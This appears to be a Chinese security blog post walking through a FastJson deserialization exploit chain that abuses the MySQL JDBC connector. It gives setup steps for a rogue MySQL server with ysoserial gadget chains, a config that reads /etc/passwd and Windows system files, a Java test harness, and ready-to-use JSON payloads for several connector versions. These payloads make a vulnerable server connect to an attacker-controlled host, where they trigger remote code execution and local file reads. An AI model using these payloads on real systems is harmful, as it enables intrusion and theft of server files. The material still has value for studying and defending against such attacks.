FastJson-Mysql利用链

我也不知道

创建时间:2021-11-24 16:06

阅读:

测试环境：

FastJson = 1.2.68 测试1.2.59也行

参考文档：

https://i.blackhat.com/USA21/Wednesday-Handouts/US-21-Xing-How-I-Used-a-JSON.pdf

Mysql Fake（开启Mysql伪服务）：

https://github.com/fnmsd/MySQL_Fake_Server

该项目依赖ysoserial反序列化工具：

https://github.com/frohoff/ysoserial

下载源码，编译：

mvn clean package -DskipTests

Mysql Fake项目里面会有config文件需要配置：

{
    "config":{
        "ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar",                 #存放ysoserial位置
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections10":["CommonsCollections10","calc"],         #反序列化名称+CC链+要执行的命令
        "CommonsCollections5":["CommonsCollections5","calc"]
    }
}

新建Payload_test.java

package com.s1;
import com.alibaba.fastjson.JSON;
 
public class Payload_test {
    public static void main(String[] args){
        String json2="{ \"name\": { \"@type\": \"java.lang.AutoCloseable\", \"@type\": \"com.mysql.jdbc.JDBC4Connection\", \"hostToConnectTo\": \"127.0.0.1\", \"portToConnectTo\": 3306, \"info\": { \"user\": \"CommonsCollections5\", \"password\": \"pass\", \"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\", \"autoDeserialize\": \"true\", \"NUM_HOSTS\": \"1\" }, \"databaseToConnectTo\": \"dbname\", \"url\": \"\" } }";
        Object obj1 = JSON.parse(json2);
            System.out.println(obj1);
        }
    }

pom设置mysql版本：

<dependency>
        <groupId>mysql</groupId>
        <artifactId>mysql-connector-java</artifactId>
        <version>5.1.13</version>
</dependency>

启用mysql fake：

python3 server.py

这里的 yso usernames就是payload中user的值，需要指定

各个版本Payload，目标服务器上需要有相应版本的jar：

• Mysql connector 5.1.x
 
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"mysql.host","portToConnectTo":3306,"info":{"user":”user","password":”pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS": "1"},"databaseToConnectTo":”dbname","url":""}
 
 
• Mysql connector 6.0.2 or 6.0.3
{"@type": "java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection","proxy":{"connectionString":{"url":"jdbc:mysql://localhost:3306/foo?allowLoadLocalInfile=true"}}}
 
 
• Mysql connector 6.x or < 8.0.20
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection","proxy":{"@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy","connectionUrl":{"@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", "masters":[{"host":"mysql.host"}], "slaves":[],"properties":{"host":"mysql.host","user":"user","dbname":"dbname","password":"pass","queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"}}}}

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 sher10cksec@foxmail.com